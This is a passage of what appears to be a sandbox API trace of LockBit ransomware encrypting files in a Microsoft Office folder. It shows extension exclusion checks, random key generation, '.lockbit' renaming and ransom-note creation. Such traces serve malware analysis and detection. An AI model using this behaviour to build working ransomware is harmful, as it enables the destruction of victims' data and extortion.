(lpString1=".sys", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21503_.GIF") returned 1 [0204.737] lstrcmpiW (lpString1="ntldr", lpString2="BD21503_.GIF") returned 1 [0204.737] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21503_.GIF") returned 1 [0204.737] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21503_.GIF") returned 1 [0204.737] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21503_.GIF") returned -1 [0204.737] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21503_.GIF") returned 1 [0204.737] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21503_.GIF") returned 1 [0204.737] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.737] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF") returned=".GIF" [0204.737] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.737] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.737] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.737] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.737] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.738] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.738] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.738] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF.lockbit") returned 78 [0204.738] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21503_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.762] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.762] malloc (_Size=0x40068) returned 0x3df0008 [0204.762] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=254) returned 1 [0204.762] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.763] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.764] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.768] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.768] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.768] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.768] free (_Block=0x1fa2ed8) [0204.768] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.768] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.769] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.769] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ec300, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbced35e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x912ec300, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21504_.GIF", cAlternateFileName="")) returned 1 [0204.769] lstrcmpiW (lpString1=".", lpString2="BD21504_.GIF") returned -1 [0204.769] lstrcmpiW (lpString1="..", lpString2="BD21504_.GIF") returned -1 [0204.769] PathFindExtensionW (pszPath="BD21504_.GIF") returned=".GIF" [0204.769] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.769] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.769] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.770] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.770] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.770] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.770] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.770] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.770] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.771] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.771] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21504_.GIF") returned 1 [0204.771] lstrcmpiW (lpString1="ntldr", lpString2="BD21504_.GIF") returned 1 [0204.771] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21504_.GIF") returned 1 [0204.771] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21504_.GIF") returned 1 [0204.771] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21504_.GIF") returned -1 [0204.771] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21504_.GIF") returned 1 [0204.771] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21504_.GIF") returned 1 [0204.771] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.771] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF") returned=".GIF" [0204.771] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.771] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.771] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.771] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.772] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.772] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.772] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.772] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.773] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.773] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF.lockbit") returned 78 [0204.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21504_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.774] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.774] malloc (_Size=0x40068) returned 0x3df0008 [0204.775] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=182) returned 1 [0204.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.776] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.781] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.781] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.781] free (_Block=0x1fa2ed8) [0204.781] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.782] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.782] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ec300, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcef9740, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x912ec300, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21505_.GIF", cAlternateFileName="")) returned 1 [0204.782] lstrcmpiW (lpString1=".", lpString2="BD21505_.GIF") returned -1 [0204.782] lstrcmpiW (lpString1="..", lpString2="BD21505_.GIF") returned -1 [0204.782] PathFindExtensionW (pszPath="BD21505_.GIF") returned=".GIF" [0204.782] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.782] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.782] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.783] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.783] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.783] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.783] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.783] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.783] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.784] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21505_.GIF") returned 1 [0204.784] lstrcmpiW (lpString1="ntldr", lpString2="BD21505_.GIF") returned 1 [0204.784] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21505_.GIF") returned 1 [0204.784] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21505_.GIF") returned 1 [0204.784] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21505_.GIF") returned -1 [0204.784] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21505_.GIF") returned 1 [0204.784] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21505_.GIF") returned 1 [0204.784] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.784] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF") returned=".GIF" [0204.784] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.784] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.784] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.784] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.784] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.784] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.784] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.784] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.790] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.790] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.790] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.790] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.791] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.791] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF.lockbit") returned 78 [0204.791] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21505_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.793] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.793] malloc (_Size=0x40068) returned 0x3df0008 [0204.793] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=175) returned 1 [0204.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.795] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.799] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.799] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.799] free (_Block=0x1fa2ed8) [0204.799] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft 